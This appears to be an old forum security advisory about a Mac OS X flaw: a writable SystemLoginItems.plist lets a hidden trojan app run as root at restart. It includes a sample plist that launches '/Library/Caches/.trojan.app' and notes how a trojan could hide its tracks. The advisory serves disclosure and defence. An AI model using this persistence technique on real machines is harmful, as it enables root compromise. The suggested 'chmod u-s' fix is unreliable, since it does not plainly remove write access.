</plist>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Hide</key>
<true/>
<key>Path</key>
<string>/Library/Caches/.trojan.app</string>
</dict>
</array>
</dict>
</plist>
The file can be overwritten, edited or replaced. The fault lies in the permissions set upon this file. Allowing anyone to edit the SystemLoginItems.plist. Upon restart the application is then run as a start up item under root or uid 0 the superuser of Unix based computers. A payload for this exploit could be easily created as a compiled AppleScript application (or bundle) which already exists in the wild. The reason for the medium risk also involves the easy detection of the exploit by knowledgeable users. A trojan can hide itself and replace the plist file after use but the user must not detect the attack before restarting the computer. However the trojan might actually restart the computer on its own posing a larger risk but higher rate of detection.
b]Solutions:[/b] Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the plist file /Library/Preferences/com.apple.SystemLoginItems.plist. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.
1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /Library/Preferences
3. Enter:
CODE
sudo chmod u-s com.apple.SystemLoginItems.plist
4. You will be prompted to enter your password, do so.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.